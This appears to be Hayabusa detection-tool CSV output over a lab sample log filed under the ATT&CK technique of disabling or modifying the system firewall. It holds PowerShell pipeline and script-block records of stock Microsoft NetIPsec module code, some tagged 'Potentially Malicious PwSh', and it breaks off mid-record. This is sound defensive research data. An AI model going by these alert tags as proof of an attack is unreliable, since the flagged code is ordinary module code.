Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.776 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.776 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.776 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.777 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.785 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.785 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.786 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.786 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.787 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.787 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.788 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 